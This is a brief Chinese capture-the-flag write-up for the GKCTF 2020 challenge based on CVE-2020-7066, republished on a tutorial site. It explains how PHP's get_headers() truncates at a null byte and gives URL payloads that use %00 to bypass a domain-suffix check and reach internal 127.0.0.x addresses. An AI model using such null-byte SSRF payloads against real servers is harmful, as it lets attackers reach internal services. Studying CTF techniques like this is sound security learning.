[GKCTF 2020]cve版签到

2022/7/12 23:30:52

本文主要是介绍[GKCTF 2020]cve版签到,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

通过题目的提示可知,这是一个CVE(cve-2020-7066)的复现

image-20220709212910405

image-20220709213005114

点击进之后也无回显
看了这个cve之后,知道这个cve就是这个get_headers()会截断URL中空字符后的内容
就根据cve的提示,可以利用%00来截断后面url的内容
题目中给出了url的结尾必须为.ctfhub.com
那么我们可以构造payload

http://1.14.71.254:28532/?url=http://127.0.0.1%00.ctfhub.com

image-20220709213525925

根据提示后面必须为123,修改payload

1.14.71.254:28532/?url=http://127.0.0.123%00.ctfhub.com

image-20220709215048598

得到flag


这篇关于[GKCTF 2020]cve版签到的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程